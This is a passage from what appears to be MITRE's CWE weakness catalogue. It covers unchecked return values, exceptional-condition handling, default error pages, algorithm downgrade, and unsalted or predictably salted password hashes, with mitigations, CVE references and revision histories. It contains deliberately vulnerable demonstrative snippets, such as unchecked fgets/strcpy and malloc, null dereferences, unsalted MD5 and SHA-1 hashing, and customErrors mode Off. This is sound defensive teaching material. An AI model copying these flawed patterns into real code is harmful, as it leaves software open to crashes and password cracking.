conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them. - - - Architecture and Design - Implementation - If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery. - - - Architecture and Design - Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur. - - - - - Consider the following code segment: - - char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf); - - The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). - - - The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). - - buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size); - - The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations: - - - - Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue. - - - It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state. - - - The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know. - - - - - - The following examples read a file into a byte array. - - char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {String userName = (String) i.Current();String pFileName = PFILE_ROOT + "/" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);} - - - FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) { - String userName = (String) i.next();String pFileName = PFILE_ROOT + "/" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray); - - - - - The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. - - - The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. - - String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {...}... - - The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. - - String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {...}... - - The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. - - - The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. - - System.clearProperty("os.name");...String os = System.getProperty("os.name");if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); - - The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. - - - The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. - - Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20)) - - In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference - (CWE-476) would then occur in the call to strcpy(). - Note that this code is also vulnerable to a buffer overflow (CWE-119). - - - In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively. - - int outputStringToFile(char *output, char *filename) { - - openFileToWrite(filename);writeToFile(output);closeFile(filename); - } - - However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example. - - int outputStringToFile(char *output, char *filename) { - int isOutput = SUCCESS; - int isOpen = openFileToWrite(filename);if (isOpen == FAIL) {printf("Unable to open file %s", filename);isOutput = FAIL;}else { - int isWrite = writeToFile(output);if (isWrite == FAIL) {printf("Unable to write to file %s", filename);isOutput = FAIL;} - int isClose = closeFile(filename);if (isClose == FAIL)isOutput = FAIL; - - }return isOutput; - } - - - - In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method. - - private File readFile = null; - public void setInputFile(String inputFile) { - - - // create readFile File object from string containing name of file - - - } - public void readFromFile() { - try { - reader = new FileReader(readFile); - - // read input file - - - } catch (FileNotFoundException ex) {...} - } - - However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code. - - private File readFile = null; - public void setInputFile(String inputFile) { - - - // create readFile File object from string containing name of file - - - } - public void readFromFile() { - try { - if (readFile == null) {System.err.println("Input file has not been set, call setInputFile method before calling openInputFile");throw NullPointerException;} - reader = new FileReader(readFile); - - // read input file - - - } catch (FileNotFoundException ex) {...}catch (NullPointerException ex) {...} - } - - - - - - CVE-2007-3798 - Unchecked return value leads to resultant integer overflow and code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798 - - - CVE-2006-4447 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447 - - - CVE-2006-2916 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916 - - - - - EXP31-PL - Do not suppress or ignore exceptions - CWE More Abstract - - - - - - - - - - Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value. - - - - CWE Content Team - MITRE - 2009-03-03 - New entry for reorganization of CWE-703. - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Improper Check for Exceptional Conditions - - - - The software does not handle or incorrectly handles an exceptional condition. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Other - Other - - - - - CVE-2021-3011 - virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011 - - - CVE-2008-4302 - Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302 - - - - - CWE Content Team - MITRE - 2009-03-03 - New entry for reorganization of CWE-703. - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Observed_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - The software does not return custom error pages to the user, possibly exposing sensitive information. - - - - - - - Confidentiality - Read Application Data - Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application. - - - - - In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things). - - Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());}} - - - - The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. - In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned. - - <customErrors mode="Off" /> - - A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned. - - <customErrors mode="RemoteOnly" /> - - Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows: - - <customErrors mode="On" defaultRedirect="YourErrorPage.htm" /> - - - - - - CWE Content Team - MITRE - 2009-03-03 - New entry for reorganization of CWE-703. - - - CWE Content Team - MITRE - 2010-09-27 - updated Description - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties. - When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the software by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques. - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2006-4302 - Attacker can select an older version of the software to exploit its vulnerabilities. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4302 - - - CVE-2006-4407 - Improper prioritization of encryption ciphers during negotiation leads to use of a weaker cipher. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407 - - - CVE-2005-2969 - chain: SSL/TLS implementation disables a verification step (CWE-325) that enables a downgrade attack to a weaker protocol. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2969 - - - CVE-2001-1444 - Telnet protocol implementation allows downgrade to weaker authentication and encryption using an Adversary-in-the-Middle AITM attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1444 - - - CVE-2002-1646 - SSH server implementation allows override of configuration setting to use weaker authentication schemes. This may be a composite with CWE-642. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1646 - - - - - - - - - This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network. See examples. - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity. - This can lead to resultant weaknesses when the required properties change, such as when the software is ported to a different platform or if an interaction error (CWE-435) occurs. - - - - - - Indirect - - - Primary - - - - - Other - Other - - - - - CVE-2006-1902 - Change in C compiler behavior causes resultant buffer overflows in programs that depend on behaviors that were undefined in the C standard. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1902 - - - - - ARR32-C - Ensure size arguments for variable length arrays are in a valid range - CWE More Abstract - - - ERR34-C - Detect errors when converting a string to a number - Imprecise - - - EXP30-C - Do not depend on the order of evaluation for side effects - CWE More Abstract - - - EXP33-C - Do not read uninitialized memory - CWE More Abstract - - - FIO46-C - Do not access a closed file - CWE More Abstract - - - INT34-C - Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand - CWE More Abstract - - - INT36-C - Converting a pointer to integer or integer to pointer - CWE More Abstract - - - MEM30-C - Do not access freed memory - CWE More Abstract - - - MSC14-C - Do not introduce unnecessary platform dependencies - - - MSC15-C - Do not depend on undefined behavior - - - MSC37-C - Ensure that control never reaches the end of a non-void function - CWE More Abstract - - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input. - - This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables. - It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. - - - - - - In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult. - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - If an attacker can gain access to the hashes, then the lack of a salt makes it easier to conduct brute force attacks using techniques such as rainbow tables. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. - Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. - Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. - - High - - - Architecture and Design - If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password. - Limited - Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware. - - - Implementation - Architecture and Design - When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. - - - - - In both of these examples, a user is logged in if their given password matches a stored password: - - unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); - //Login if hash matches stored hash - if (equal(ctext, secret_password())) {login_user();}} - - - String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); - //Login if hash matches stored hash - if (equal(digest,secret_password())) {login_user();} - - This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). - - - In this example, a new user provides a new username and password to create an account. The program hashes the new user's password then stores it in a database. - - def storePassword(userName,Password):hasher = hashlib.new('md5')hasher.update(Password)hashedPassword = hasher.digest() - - # UpdateUserLogin returns True on success, False otherwise - return updateUserLogin(userName,hashedPassword) - - - While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised. - Fixing this is as simple as providing a salt to the hashing function on initialization: - - def storePassword(userName,Password):hasher = hashlib.new('md5',b'SaltGoesHere')hasher.update(Password)hashedPassword = hasher.digest() - - # UpdateUserLogin returns True on success, False otherwise - return updateUserLogin(userName,hashedPassword) - - - Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327. - - - - - CVE-2008-1526 - Router does not use a salt with a hash, making it easier to crack passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526 - - - CVE-2006-1058 - Router does not use a salt with a hash, making it easier to crack passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058 - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2013-02-21 - updated Description, Potential_Mitigations, References, Relationships, Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software properly neutralizes certain special elements, but it improperly neutralizes equivalent special elements. - The software may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the software may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the software might filter a dangerous "-e" command-line switch when calling an external program, but it might not account for "--exec" or other switches that have the same semantics. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Other - Other - - - - - Requirements - Programming languages and supporting technologies might be chosen which are not subject to these issues. - - - Implementation - Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input. - - - - - Equivalent Special Element Injection - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Equivalent Special Element Injection - Failure to Resolve Equivalent Special Elements into a Different Plane - - - - The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software uses a predictable salt as part of the input. - - This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide. - It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. - - - - - - In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult. - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - - Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. - Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. - Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. - - High - - - Implementation - If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password. - Limited - Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware. - - - - - CVE-2008-4905 - Blogging software uses a hard-coded salt when calculating a password hash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905 - - - CVE-2002-1657 - Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657 - - - CVE-2001-0967 - Server uses a constant salt when encrypting passwords, simplifying brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967 - - - CVE-2005-0408 - chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408 - - - - - - - - - - - - - - - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CWE Content Team - MITRE - 2009-03-03 - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE 